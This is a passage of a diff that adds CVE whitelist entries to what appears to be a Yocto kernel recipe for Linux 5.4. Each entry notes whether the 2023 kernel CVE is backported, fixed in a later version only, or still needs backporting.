+CVE_CHECK_WHITELIST += "CVE-2023-2124"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21255"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21264"
+
+# CVE-2023-21400 has no known resolution
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2156"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-2162"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2163"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2166"
+
+# CVE-2023-2176 needs backporting (fixed from 6.3rc1)
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2023-2177"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-2194"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2235"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2236"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2248"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-2269"
+
+# CVE-2023-22995 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22996"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22997"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22998"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22999"
+
+# CVE-2023-23000 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23001"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23002"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23003"
+
+# CVE-2023-23004 needs backporting (fixed from 5.19rc1)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23005"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2023-23006"
+
+# CVE-2023-23039 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-23454"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-23455"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-23559"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23586"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2430"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-2483"
+
+# fixed-version: only affects 5.6rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-25012"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2513"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-25775"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2598"
+
+# CVE-2023-26242 has no known resolution
+
+# CVE-2023-2640 has no known resolution
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26544"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-26545"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26605"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26606"
+
+# cpe-stable-backport: Backported in 5.4.225
+CVE_CHECK_WHITELIST += "CVE-2023-26607"
+
+# cpe-stable-backport: Backported in 5.4.227
+CVE_CHECK_WHITELIST += "CVE-2023-28327"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-28328"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28410"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28464"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-28466"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2023-2860"
+
+# CVE-2023-28746 needs backporting (fixed from 6.9rc1)
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2023-28772"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28866"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2898"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-2985"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-3006"
+
+# Skipping CVE-2023-3022, no affected_versions
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-30456"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-30772"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2023-3090"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2023-3106"
+
+# Skipping CVE-2023-3108, no affected_versions
+
+# CVE-2023-31081 has no known resolution
+
+# CVE-2023-31082 has no known resolution
+
+# CVE-2023-31083 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-31084 needs backporting (fixed from 6.4rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-31085"
+
+# cpe-stable-backport: Backported in 5.4.247
+CVE_CHECK_WHITELIST += "CVE-2023-3111"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3117"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-31248"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2023-3141"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-31436"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2023-3159"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-3161"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3212"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-3220"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-32233"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32247"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32248"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32250"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32252"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32254"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32257"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32258"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-32269"
+
+# CVE-2023-32629 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-3268"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3269"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3312"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3317"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-33203"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33250"
+
+# CVE-2023-33288 needs backporting (fixed from 6.3rc4)
+
+# cpe-stable-backport: Backported in 5.4.248
+CVE_CHECK_WHITELIST += "CVE-2023-3338"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3355"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3357"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-3358"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3359"
+
+# CVE-2023-3389 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3390"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33951"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33952"
+
+# CVE-2023-3397 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.249
+CVE_CHECK_WHITELIST += "CVE-2023-34255"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-34256"
+
+# fixed-version: only affects 6.1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-34319"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-34324"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3439"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-35001"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-3567"
+
+# CVE-2023-35693 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2023-35788"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35823"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35824"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-35826"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-35827"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35828"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-35829"
+
+# cpe-stable-backport: Backported in 5.4.248
+CVE_CHECK_WHITELIST += "CVE-2023-3609"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3610"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-3611"
+
+# CVE-2023-3640 has no known resolution
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-37453"
+
+# CVE-2023-37454 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-3772"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3773"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3776"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3777"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2023-3812"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38409"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38426"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38427"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38428"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38429"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38430"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38431"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38432"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3863"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3865"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3866"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3867"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39189"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-39191"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39192"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39193"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-39194"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-39197"
+
+# CVE-2023-39198 needs backporting (fixed from 6.5rc7)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4004"
+
+# CVE-2023-4010 has no known resolution
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4015"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-40283"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-40791"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4128"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-4132"
+
+# CVE-2023-4133 needs backporting (fixed from 6.3)
+
+# CVE-2023-4134 needs backporting (fixed from 6.5rc1)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4147"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4155"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4194"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4206"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4207"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4208"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4244"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4273"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42752"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42753"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-42754"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42755"
+
+# fixed-version: only affects 6.4rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-42756"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2023-4385"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-4387"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4389"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4394"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-44466"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-4459"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4563"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4569"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-45862"
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2023-45863"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-45871"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-45898"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4610"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4611"
+
+# CVE-2023-4622 needs backporting (fixed from 6.5rc1)
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-4623"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-46343"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-46813"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-46838"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-46862"
+
+# CVE-2023-47233 needs backporting (fixed from 6.9rc1)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4732"
+
+# CVE-2023-4881 needs backporting (fixed from 6.6rc1)
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-4921"
+
+# CVE-2023-50431 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5090"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-51042"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-51043"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5158"
+
+# CVE-2023-51779 needs backporting (fixed from 6.7rc7)
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2023-5178"
+
+# cpe-stable-backport: Backported in 5.4.265
+CVE_CHECK_WHITELIST += "CVE-2023-51780"
+
+# cpe-stable-backport: Backported in 5.4.265
+CVE_CHECK_WHITELIST += "CVE-2023-51781"
+
+# cpe-stable-backport: Backported in 5.4.265
+CVE_CHECK_WHITELIST += "CVE-2023-51782"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5197"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2023-52340"
+
+# CVE-2023-52429 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52433"
+
+# CVE-2023-52434 needs backporting (fixed from 6.7rc6)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52435"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52436"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52438"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52439"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52440"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52441"
+
+# CVE-2023-52442 needs backporting (fixed from 6.5rc4)
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52443"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52444"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52445"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52446"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52447"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52448"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52449"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52450"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52451"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52452"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52453"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52454"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52455"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52456"
+
+# fixed-version: only affects 6.1rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52457"
+
+# CVE-2023-52458 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52459"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52460"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52461"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52462"
+
+# fixed-version: only affects 5.8rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52463"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52464"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52465"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52467"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52468"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52469"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52470"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52471"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52472"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52473"
+
+# CVE-2023-52474 needs backporting (fixed from 6.4rc1)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52475"
+
+# CVE-2023-52476 needs backporting (fixed from 6.6rc6)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52477"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52478"
+
+# CVE-2023-52479 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52480 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52481 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52482 needs backporting (fixed from 6.6rc4)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52483"
+
+# CVE-2023-52484 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52485 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52486"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52487"
+
+# CVE-2023-52488 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52489 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52490"
+
+# CVE-2023-52491 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52492"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52493"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52494"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52495"
+
+# CVE-2023-52497 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52498 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52499"
+
+# CVE-2023-52500 needs backporting (fixed from 6.6rc2)
+
+# CVE-2023-52501 needs backporting (fixed from 6.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52502"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52503"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2023-52504"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52505"
+
+# CVE-2023-52506 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52507"
+
+# CVE-2023-52508 needs backporting (fixed from 6.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52509"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52510"
+
+# CVE-2023-52511 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52512"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52513"
+
+# CVE-2023-52515 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52516 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-52517 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52518"
+
+# CVE-2023-52519 needs backporting (fixed from 6.6rc5)
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52520"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52522"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52523"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52524"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52525"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52526"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52527"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52528"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52529"
+
+# CVE-2023-52530 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52531 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52532 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52559 needs backporting (fixed from 6.6rc5)
+
+# fixed-version: only affects 5.16rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52560"
+
